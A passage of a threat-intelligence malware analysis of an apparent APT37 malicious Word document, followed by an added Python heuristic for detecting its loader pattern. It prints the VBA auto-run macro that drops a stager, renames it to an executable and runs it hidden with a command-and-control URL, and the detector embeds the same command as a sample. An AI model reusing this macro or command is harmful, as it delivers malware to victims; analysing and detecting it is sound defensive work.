lazarusholic

APT 37 strike again ?

2020-04-23, StrangerealIntel
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/APT37/2020-04-23/Analysis.md
#APT37

## APT 37 strike again ?
## Table of Contents
* [Malware analysis](#Malware-analysis)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
  + [Original Tweet](#tweet)
  + [Link Anyrun](#Links-Anyrun)
  + [Articles](#Articles)

<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h6>The initial vector is a maldoc with a macro. Its Document_Open handler decrypts the next stager, saves it to disk and executes it, passing the URL to contact as an argument. The macro then saves the modified document so that the payload is not executed a second time when the victim reopens it.</h6>

```vb
Private Sub Document_Open()
    Dim n As Long
    Dim cLine As String
    Dim path As String
    ' Image1 is used as a "first run" flag: once shrunk to 1x1 and saved, this branch is skipped
    If Image1.Width > 2 And Image1.Height > 2 Then
        Image1.Width = 1
        Image1.Height = 1
        Image2.AutoSize = True
        ' Reveal the decoy text to the reader
        With ActiveDocument.Content
            .Font.ColorIndex = wdBlack
        End With
        ' Decrypt the next stager and write it to disk (helper analysed below)
        path = save2file()
        ' Rename the dropped file to .exe and run it with the C2 URL as argument
        cLine = "cmd /c cd /d %USERPROFILE% && ren up.txt up.exe && up http://mydownload-202001.c1.biz"
        n = Shell(cLine, vbHide)
    End If
    ' Persist the shrunken image so the macro body does not run again
    ActiveDocument.Save
End Sub
```
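
A triage heuristic for this loader pattern, written as an added example (not part of the StrangerealIntel analysis): it scans VBA source text for the traits of the macro above (auto-exec entry point, hidden Shell of a string variable, rename of a dropped file to .exe, URL handed to it, self-save). The embedded sample is constructed from the macro shown above; only the URL is taken from the page.

```python
import re

# Constructed sample reproducing the structure of the Document_Open macro above.
SAMPLE_VBA = r'''
Private Sub Document_Open()
Dim n As Long
Dim cLine As String
If Image1.Width > 2 And Image1.Height > 2 Then
Image1.Width = 1
path = save2file()
cLine = "cmd /c cd /d %USERPROFILE% && ren up.txt up.exe && up http://mydownload-202001.c1.biz"
n = Shell(cLine, vbHide)
End If
ActiveDocument.Save
End Sub
'''

AUTO_EXEC = re.compile(r"\bSub\s+(Document_Open|AutoOpen|Workbook_Open|Auto_Open)\b", re.I)
STRING_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"', re.M)
SHELL_CALL = re.compile(r"\bShell\s*\(\s*(\w+)\s*,\s*(vbHide|0)\s*\)", re.I)
RENAME = re.compile(r"\bren(?:ame)?\s+(\S+)\s+(\S+\.exe)\b", re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)

def analyze_vba(source: str) -> dict:
    """Return the indicators found in a VBA module (hypothetical helper)."""
    # Map string variables to their literal so a Shell(var, ...) call can be resolved
    strings = {name: val.replace('""', '"') for name, val in STRING_ASSIGN.findall(source)}
    findings = {
        "auto_exec": AUTO_EXEC.search(source) is not None,
        "hidden_shell": False, "command": None,
        "rename_to_exe": None, "urls": [],
        "saves_document": re.search(r"\bActiveDocument\.Save\b", source, re.I) is not None,
    }
    for var, _mode in SHELL_CALL.findall(source):
        cmd = strings.get(var)
        if cmd is None:
            continue
        findings["hidden_shell"] = True
        findings["command"] = cmd
        m = RENAME.search(cmd)
        if m:
            findings["rename_to_exe"] = (m.group(1), m.group(2))
        findings["urls"].extend(URL.findall(cmd))
    return findings

def risk_score(f: dict) -> int:
    """0-5 score: one point per trait; 5 is the full dropper chain of this maldoc."""
    return sum([f["auto_exec"], f["hidden_shell"], f["rename_to_exe"] is not None,
                bool(f["urls"]), f["saves_document"]])
```

Run `analyze_vba` over output of a VBA extractor such as olevba; a rename-to-.exe followed by a URL argument is a strong signal even when the stager itself is encrypted inside the document.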

<h6>The called method parsed …